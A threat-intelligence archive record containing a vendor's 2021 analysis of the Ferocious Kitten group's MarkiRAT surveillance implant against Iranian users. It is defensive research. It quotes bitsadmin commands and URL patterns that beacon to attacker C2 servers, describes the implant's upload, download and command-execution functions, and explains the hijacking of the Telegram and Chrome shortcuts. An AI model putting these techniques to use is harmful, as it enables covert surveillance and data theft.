{ "id": "b4ab23b3-0cb8-413f-9917-458dd24c81de", "created_at": "2026-04-06T00:06:51.253361Z", "updated_at": "2026-04-10T03:35:17.064302Z", "deleted_at": null, "sha1_hash": "45de45d06730df7b420ca326a1c792ecabb3ce0a", "title": "Ferocious Kitten: 6 years of covert surveillance in Iran", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1520050, "plain_text": "Ferocious Kitten: 6 years of covert surveillance in Iran\r\nBy GReAT\r\nPublished: 2021-06-16 · Archived: 2026-04-05 12:50:25 UTC\r\nFerocious Kitten is an APT group that since at least 2015 has been targeting Persian-speaking individuals who\r\nappear to be based in Iran. Although it has been active for a long time, the group has mostly operated under the\r\nradar and has not been covered by security researchers to the best of our knowledge. It is only recently that it drew\r\nattention when a lure document was uploaded to VirusTotal and went public thanks to researchers on Twitter.\r\nSince then, one of its implants has been analyzed by a Chinese threat intelligence firm.\r\nWe were able to expand on some of the findings about the group and provide insights into the additional variants\r\nthat it uses. The malware dropped from the aforementioned document is dubbed ‘MarkiRAT’ and used to record\r\nkeystrokes, clipboard content, provide file download and upload capabilities as well as the ability to execute\r\narbitrary commands on the victim machine. We were able to trace the implant back to at least 2015, where it also\r\nhad variants intended to hijack the execution of the Telegram and Chrome applications as a persistence method.\r\nInterestingly, some of the TTPs used by this threat actor are reminiscent of other groups that are active against a\r\nsimilar set of targets, such as Domestic Kitten and Rampant Kitten. In this report we aim to provide more details\r\non these findings and our own analysis on the mechanics of the MarkiRAT malware.\r\nBackground\r\nTwo suspicious documents that were uploaded to VirusTotal in July 2020 and March 2021, and which seem to be\r\noperated by the same attackers, caught our attention. One of the documents is called “عاشقان با عاشقانه همبستگی\r\n2آزادی.doc” (translates from Persian as “Romantic Solidarity With Lovers of Freedom2.doc”) and contains\r\nmalicious macros that are accompanied by an odd decoy message attempting to convince the victim to enable its\r\ncontent:\r\nhttps://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/\r\nPage 1 of 13\n\nDecoy content in one of the malicious documents\r\nAfter enabling their content, both documents drop malicious executables to the infected system and display\r\nmessages against the regime in Iran, such as the following (translated from Persian):\r\nhttps://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/\r\nPage 2 of 13\n\nI am Hussein Jafari\r\nI was a prisoner of the regime during 1363-64.\r\nAdd my name to the prisoners' statement of Iraj Mesdaghi about the bloodthirsty mercenary.\r\nPlease use the nickname Jafar for my own safety and my family.\r\nHussein Jafari\r\nJuly 1399\r\nMessages that appear in the documents after enabling their content\r\nThe macros in the documents convert an embedded executable from hexadecimal and write it to the “Public”\r\nfolder as “update.exe”. Afterwards, the payload gets copied to the “Startup” directory under the name\r\n“svehost.exe” to ensure it automatically runs when the system is started:\r\nhttps://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/\r\nPage 3 of 13\n\nMacros copying the payload to the startup folder\r\nIn addition to the above documents, we managed to find malicious executables that were used by the attackers and\r\ndate back to as early as 2015. It seems that in the past the attackers delivered executables directly to the victims\r\nand only recently introduced weaponized documents as the initial infection vector.\r\nMoreover, the attackers used the “right-to-left override” technique that causes parts of the executables’ names to\r\nbe reversed, making them appear to have a different extension such as .jpg or .mp4, rather than their real one.\r\nWhen run, the executables display decoy content to the victims, with some presenting images of protests against\r\nthe Iranian regime and its institutions, or videos from resistance camps.\r\nDecoy image found within one of the malicious executables showing a protest against the central bank of Iran\r\nAnalysis of MarkiRAT\r\nThe aforementioned infection vectors are used to deploy unique malware we dubbed MarkiRat. While we were\r\nable to identify several versions of it, it is evident that the core of the malware remained the same. The internal\r\nname of the implant, as becomes apparent from PDB paths in the executable binaries, is ‘mklg’. This name\r\nperhaps stands for ‘Mark KeyLogGer’, where ‘Mark’ is an internal HTML tag used by the implant.\r\nhttps://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/\r\nPage 4 of 13\n\nDuring its activity, we could see that the authors changed the compilation environment and incorporated new\nlibraries to hinder both manual and automatic static analysis. From 2015 to February 2018, the malware was\ncompiled with Visual Studio 2013 and 2015, whereas in February 2018, the developers moved to Visual Studio\n2017 and embedded the malware’s logic within Microsoft Foundation Class (MFC) classes. In accordance with\nthese changes, the internal name was also modified to ‘mfcmklg.pdb’.\nThe MarkiRAT implant starts by performing the following actions:\nCreates a mutex named “Global\\\\{2194ABA1-BFFA-4e6b-8C26-D1BB20190312}” during initialization of\nan MFC CWnd class instance.\nExpands the environment variable ‘PUBLIC’ to be used as the base directory for the malware’s work\nrepository, which is located under ‘Appdata\\Windows’.\nChecks the running processes on the victim machine to look for ‘exe’ (Kaspersky) or ‘bdagent.exe’\n(Bitdefender). If one of them is found it will be indicated using a numeric value passed to the server via a\nparameter named ‘k’, using a GET request to the URL as outlined below. The presence of a security\nsolution from Kaspersky will be denoted with the value ‘1’ and Bitdefender with the value ‘3’. However,\nno change in the malware’s behavior was observed based on this check.\nhxxp://C2/ech/client.php?u=[computername]_[username]\u0026k=[AV_value]\nCreates a log file named ‘nfo’ with information as shown below (time of the implant’s initiation and its\nexecution path).\n\n==Hello: Fri Mar 5 18:56:27 2021\n== \n==C:\\Users\\[username]\\AppData\\Local\\Temp\\sample.exe== Initiates communication with the C2 server by issuing an HTTP POST request, registering the victim as a\nnew client using the URL scheme and body content specified below:\nPOST hxxp://[C2 address]/i.php?u=[computername]_[username]\u0026i=[IP address]\np= \n**Windows Title1**\n\n**Windows Title2** \nThe expected server response acknowledging registration is:\nIssues an additional beacon to the C2 server by using Microsoft’s BITS administration utility with the\nfollowing commands:\n\u003e bitsadmin /cancel pdj\n\u003e bitsadmin /create pdj\n\u003e bitsadmin /SetPriority pdj HIGH\nhttps://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/\nPage 5 of 13\n\n\u003e bitsadmin /addfile pdj \"hxxp://[C2 address]/i.php?u=[computername]-[username]\u0026i=[proxy ip]\"\r\n%PUBLIC%\\AppData\\Libs\\p.b\r\n\u003e bitsadmin /resume pdj\r\nThe purpose of this part is not entirely clear, but we think it’s probably used to bypass a potential proxy\r\nserver in the victim network, thus providing the C2 with the victim’s IP.\r\nStarts a keylogger with all keystrokes and clipboard content being stored locally in the aforementioned .nfo\r\nfile, exfiltrated to the C2 using the same URL described previously in the POST request. It is interesting to\r\nnote that an active Keepass (password manager) process gets killed before starting the keylogger. This is\r\nlikely intended to force the user to restart the program and enter a master password that is then stolen via\r\nthe keylogger.\r\nFollowing these actions, the malware initiates a thread to constantly beacon the C2, waiting to receive commands\r\nand executing them accordingly. The beacon request is issued with the following request:\r\nGET hxxp://[C2 address]/ech/echo.php?req=rr\u0026u=[computername]_[username]\r\nThe expected response carries a command to be executed and needs to be formatted as JSON. It is then parsed\r\nusing the open-source library JsonCPP, where the following commands are supported:\r\ncmd cmd2 cmd3 Description\r\ndelay\r\nargument: time\r\nto sleep in\r\nmilliseconds\r\n– Sleep for a given amount of milliseconds\r\nuploadsf\r\nargument: path\r\nto directory that\r\nwill be\r\nenumerated for\r\nfile upload\r\n–\r\nUpload all the files in the argument repository.\r\nThe upload is performed by using the following POST\r\nrequest:\r\nhxxps://[C2]/up/uploadx.php?=u=\r\n[computername]_[username]\r\nuploads argument: path\r\nto directory that\r\nwill be\r\nenumerated for\r\nfile upload\r\n– Upload files in the argument repository.\r\nThe malware is looking for files carrying specific\r\nextensions: .rtf, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .pps,\r\n.ppsx, .txt, .gpg, .pkr, .kdbx, .key, .jpg. These formats\r\nsuggest that the threat actor is interested in Office\r\ndocuments, encryption keys, password manager files and\r\nimage files.The upload is performed by using the same\r\nhttps://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/\r\nPage 6 of 13\n\nPOST request as the one used by the ‘uploadsf’\r\ncommand\r\nupload\r\nargument: path\r\nto file to upload\r\n–\r\nUpload a specific file (argument) using the same URL\r\nthan the ‘uploadsf’ command\r\nsmart dir –\r\nList files and repositories.\r\nThe listing is sent to\r\nhxxp://[C2]/ech/rite.php\r\nsmart upload –\r\nupload files with carrying specific extensions (.pdf, .rtf,\r\n.doc, .docx, .xls, .xlsx, .ppt, .pptx, .pps, .ppsx, .txt; .jpg,\r\n.kdbx, .key) from pre-defined, common directories,\r\nnamely: Desktop, Documents, Pictures, Downloads,\r\nViberPC, Skype, Telegram and additional drives.\r\nsmart fulldir –\r\nList files and directories looking for filenames with the\r\nspecific extensions (.pdf, .rtf, .doc, .docx, .xls, .xlsx,\r\n.ppt, .pptx, .pps, .ppsx, .txt; .jpg, .kdbx, .key) located in\r\npre-defined, common directories: Desktop, Documents,\r\nPictures, Downloads, ViberPC, Skype, Telegram and\r\nadditional drives.\r\nThe listing is sent to\r\nhxxp://[C2]/ech/rite.php\r\nruninhome\r\nargument:\r\nexecutable file\r\nname\r\n–\r\nRun an executable located in the malware repository in\r\nthe user’s home directory.\r\ndownload\r\nargument1:\r\nURL to\r\ndownload the\r\nfile\r\nargument2:\r\npath to store\r\nthe\r\ndownloaded\r\nfile\r\nDownload a file from the C2 server and store locally\r\n(filename: argument2)\r\nAny other command that doesn’t fit the above patterns will be forwarded and processed as an argument to\r\n‘cmd.exe /c’ and run via the ‘ShellExecuteW’ API.  Additionally, each beacon is accompanied with a screenshot\r\nthat is initially saved as ‘scr.jpg’ in the public directory and subsequently issued to the C2 using the same HTTP\r\nPOST request as in the ‘uploadsf’ command.\r\nTelegram hijacking variant\r\nhttps://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/\r\nPage 7 of 13\n\nOne of the discovered MarkiRAT variants was used to intercept the execution of Telegram and launch the malware\r\nalong with it. The core of the malware is the same as described previously for MarkiRAT, with the exception of\r\nfunctions in charge of the malware’s deployment on the victim machine. These conduct the following actions:\r\nCheck for the Telegram installation directory by enumerating the files on disk and looking for the ‘exe’\r\nbinary in a directory named ‘tdata’ (internal repository used by the Telegram desktop utility).\r\nIf the file exists, the malware copies itself to the same directory as ‘exe’, while preserving the icon of the\r\nTelegram application.\r\nModify the shortcut that launches Telegram by replacing its path to the one corresponding to ‘exe’, as\r\noutlined below.\r\nTelegram shortcut launching the payload along with the legitimate executable\r\nFollowing these actions, if ‘data.exe’ is executed as a result of initiating Telegram, the usual deployment logic is\r\nskipped and the malware directly executes the real Telegram application along with the malicious MarkiRAT\r\npayload.\r\nChrome hijacking variant\r\nAnother interesting variant targets the Chrome browser and can be split into two components going by the\r\nfollowing internal names (as evident from the PDB paths left in them):\r\nmklgsecondary.pdb\r\nmklgchrome.pdb\r\nhttps://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/\r\nPage 8 of 13\n\nThe first stage logic is performed by ‘mklgsecondary’ which serves the purpose of downloading a file named\r\n‘chrome.txt’ from a C2 server using the BITS utility. The downloader modifies the Chrome shortcut using the\r\nsame method previously described for the Telegram variant. The downloaded PE file (‘chrome.txt’/’mklgchrome’)\r\ngets executed each time the user starts Chrome, thereby running the real Chrome application as well as executing\r\nthe MarkiRAT payload. As is the case with variants targeting Telegram installations, the usual initialization routine\r\nis skipped.\r\nDownloader\r\nOne unique and fairly recent variant is a plain downloader that follows a similar convention to the aforementioned\r\nMarkiRAT implants. It also leverages MFC and embeds its logic within a CDialog class, getting executed upon\r\ninitiation of an MFC dialog object during runtime. Notably, it contains the PDB path\r\n‘D:\\mklgs\\mfcdownl\\Release\\mfcdownl.pdb’, resembling those used by the malware authors in all other variants,\r\nand contacts the C2 server behind the domain ‘microsoft.com-view[.]space’, which was also observed in other\r\nrecent MarkiRAT samples. The use of this sample diverges from those used by the group in the past, where the\r\npayload was dropped by the malware itself, suggesting that the group might be in the process of changing some of\r\nits TTPs.\r\nThe execution flow of this component is mostly straight-forward and consists of the following actions:\r\nThe malware checks for command line arguments containing a URL path to the C2 server and the file\r\nname used for the downloaded executable. If less than three arguments are passed, the program terminates.\r\nThe file is downloaded from the hardcoded domain ‘com-view[.]space’ using the WinHttp API, passing the\r\nsecond argument as the server path from which the file will be downloaded and employing the third\r\nargument for the retrieved payload’s filename to be saved in the %PUBLIC% directory.\r\nThe malware generates a numeric value based on the current system time and uses it to rename the\r\ndownloaded binary (i.e., it will be stored as \u003cnumeric_value\u003e.exe in the %PUBLIC% directory).\r\nFinally, the downloaded payload is executed by resolving the path of exe and passing the newly generated\r\npath of the downloaded binary as an argument. The resulting command line is initiated as a new process\r\nusing the ‘CreateProcessW’ API function.\r\nInterestingly, the sample contains hardcoded strings in Arabic taken from the Quran that appear at the beginning of\r\nthe function with the malware’s business logic. The second verse means “And We shall raise a barrier in front of\r\nthem and a barrier behind them, and cover them over so that they will not be able to see.” It is often used when\r\none is being chased by an enemy, in the hope that they are overlooked.\r\nVerses from the Quran in the malware\r\nhttps://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/\r\nPage 9 of 13\n\nEvidence of Android implants\r\nApart from the PE malware, we were able to identify several URLs in our telemetry that suggest there were\r\nAndroid applications hosted on the C2 infrastructure:\r\nhxxp://updatei[.]com/ddd/classes.dex\r\nhxxp://updatei[.]com/hr.apk\r\nUnfortunately, we were unable to obtain the underlying samples and can therefore only assume that these are\r\nmalicious implants targeted at mobile users, developed and leveraged by the threat actor. That said, similar activity\r\naimed at targets in Iran suggests that actors engaged in this type of pursuit may very well be operating several\r\ncampaigns, each focusing on a different technical platform with categorized targeting based on victim profiles. An\r\nexample of this was mentioned in our recent APT trends report and discussed more thoroughly in a private report\r\ndelivered to customers of our APT reporting service, where we identified the DomesticKitten threat actor\r\nspreading both Windows- and Android-based malware against Persian-speaking users within the same timeframe.\r\nWho are the targets?\r\nThe attack appears to be mainly targeting Iranian victims. In addition to the mostly Persian file names, some of the\r\nmalicious websites used subdomains impersonating popular services in Iran to appear legitimate. For example,\r\n“aparat.com-view[.]space” was mimicking Aparat, an Iranian video sharing service, while “khabarfarsi.com-view[.]org” was mimicking an Iranian news website.\r\nIn addition to the Telegram payload variant analyzed above, one of the malicious samples discovered was a\r\nbackdoored version of Psiphon, an open-source VPN tool often used to bypass internet censorship. The targeting\r\nof Psiphon and Telegram, both of which are quite popular services in Iran, underlines the fact that the payloads\r\nwere developed with the purpose of targeting Iranian users in mind. Moreover, the decoy content displayed by the\r\nmalicious files often made use of political themes and involved images or videos of resistance bases or strikes\r\nagainst the Iranian regime, suggesting the attack is aimed at potential supporters of such movements within the\r\ncountry.\r\nA stronger indicator for the aforementioned victim profile can be observed in the code itself, particularly in the\r\nkeylogger’s logic. Before writing a keystroke to the log, the malware obtains the current locale identifier using the\r\n‘GetKeyboardLayout’ API. The retrieved value is checked against several hardcoded paths in which the low\r\nDWORD is set to 0x0429. This value corresponds to the Persian language ID, thereby solidifying the assessment\r\nthat the targeted users are Persian speaking.\r\nhttps://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/\r\nPage 10 of 13\n\nLocale check before writing a keystroke to a file, showing hardcoded values corresponding to the Persian\r\nlanguage ID (0x0429)\r\nThe Kitten connection\r\nDuring our analysis we found similarities between Ferocious Kitten and other threat groups, namely Domestic\r\nKitten and Rampant Kitten, both in terms of their TTPs and victims. Like Domestic Kitten, Ferocious Kitten has\r\nused the same set of C2 servers over long periods of time and shows the same URL patterns for C2\r\ncommunication using only three letters such as “updatei[.]com/fff/” or “updatei[.]com/fil/”.\r\nJust like Rampant Kitten, both threat groups attempted to gather information from the Keepass password manager\r\nand changed the execution flow of Telegram Desktop to ensure the persistence of their malware. And although we\r\nwere unable to find solid connections between the codebase or infrastructure of these groups, the various\r\ncampaigns operated by the three threat groups share a distinct targeting scheme and go after Iranian victims.\r\nThe WHOIS information of the malicious domains showed that Ferocious Kitten used Iranian hosting services\r\nsuch as Pardaz IT or Farasat IT Group. Furthermore, some of the PDBs in the malicious samples from 2017\r\nmentioned the name “Ghabli” (e.g., ‘D:\\ghabli\\Projects\\mklgtelegram\\Release\\mklgtelegram.pdb’), which appears\r\nto be a Persian surname.\r\nPDB path from a Ferocious Kitten sample\r\nhttps://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/\r\nPage 11 of 13\n\nAn interesting thing to note is that one of the domains we are monitoring for related activity, ‘updatei[.]com’,\r\nappeared in a Facebook page called “Iranian Association of Combatant Programmers” (translated from Persian).\r\nThe attackers registered this domain in February 2015, and the post was published in March of the same year. The\r\nURL mentioned in the post was meant to download an archive called “cports.rar” that supposedly contained the\r\n“cports.exe” tool; unfortunately, we couldn’t examine the archive’s contents because the website was down at the\r\ntime of analysis.\r\nTranslated post from Facebook page mentioning one of the malicious domains\r\nConclusions\r\nFerocious Kitten is an example of an actor that operates in a wider ecosystem intended to track individuals in Iran.\r\nSuch threat groups do not appear to be covered that often and can therefore get away with casually reusing\r\ninfrastructure and toolsets without worrying about them being taken down or flagged by security solutions.\r\nAdditionally, such groups are known to target various platforms (most notably Windows and Android) and often\r\nshare TTPs, as indicated in this report. The latter in particular may suggest that the underlying actors may be\r\ninterconnected, sharing developers or operating under a mutual supervisor. While not technically impressive, it’s\r\ninteresting that the actor created specialized variants to be launched alongside popular programs, namely Chrome\r\nand Telegram. The technical sophistication of the toolset doesn’t appear to be a high priority for the attackers, who\r\nseem to be more intent on expanding their arsenal.\r\nhttps://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/\r\nPage 12 of 13\n\nEtt fel inträffade.\r\nDet går inte att köra JavaScript.\r\nIOCs\r\nSource: https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/\r\nhttps://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/\r\nPage 13 of 13", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "MISPGALAXY", "MITRE", "Malpedia" ], "references": [ "https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/" ], "report_names": [ "102806" ], "threat_actors": [ { "id": "4a1e62ec-42d0-47c3-8b65-b3c5d9c496c0", "created_at": "2022-10-25T16:07:23.609046Z", "updated_at": "2026-04-10T02:00:04.686029Z", "deleted_at": null, "main_name": "Ferocious Kitten", "aliases": [ "G0137" ], "source_name": "ETDA:Ferocious Kitten", "tools": [ "MarkiRAT" ], "source_id": "ETDA", "reports": null }, { "id": "44d5df14-6a25-41d6-a54c-7c7ebac358cf", "created_at": "2023-01-06T13:46:38.817312Z", "updated_at": "2026-04-10T02:00:03.111227Z", "deleted_at": null, "main_name": "Domestic Kitten", "aliases": [ "Bouncing Golf", "APT-C-50" ], "source_name": "MISPGALAXY:Domestic Kitten", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e580dec5-1558-4c79-8eda-c968d1cd206f", "created_at": "2022-10-25T16:07:24.090829Z", "updated_at": "2026-04-10T02:00:04.863398Z", "deleted_at": null, "main_name": "Rampant Kitten", "aliases": [], "source_name": "ETDA:Rampant Kitten", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "75297180-4681-4500-ad0e-cde0edeb1ed2", "created_at": "2024-02-06T02:00:04.156486Z", "updated_at": "2026-04-10T02:00:03.581217Z", "deleted_at": null, "main_name": "Ferocious Kitten", "aliases": [], "source_name": "MISPGALAXY:Ferocious Kitten", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "30f6ddb3-f5aa-4b78-a1a5-e37c42b2c560", "created_at": "2022-10-25T16:07:23.544297Z", "updated_at": "2026-04-10T02:00:04.64999Z", "deleted_at": null, "main_name": "Domestic Kitten", "aliases": [ "APT-C-50", "Bouncing Golf", "G0097" ], "source_name": "ETDA:Domestic Kitten", "tools": [ "FurBall", "GolfSpy" ], "source_id": "ETDA", "reports": null }, { "id": "306b00c6-fec4-4698-86c5-2aed9feedd38", "created_at": "2022-10-25T15:50:23.444155Z", "updated_at": "2026-04-10T02:00:05.401052Z", "deleted_at": null, "main_name": "Ferocious Kitten", "aliases": [ "Ferocious Kitten" ], "source_name": "MITRE:Ferocious Kitten", "tools": [ "MarkiRAT", "BITSAdmin" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434011, "ts_updated_at": 1775792117, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/45de45d06730df7b420ca326a1c792ecabb3ce0a.pdf", "text": "https://archive.orkl.eu/45de45d06730df7b420ca326a1c792ecabb3ce0a.txt", "img": "https://archive.orkl.eu/45de45d06730df7b420ca326a1c792ecabb3ce0a.jpg" } }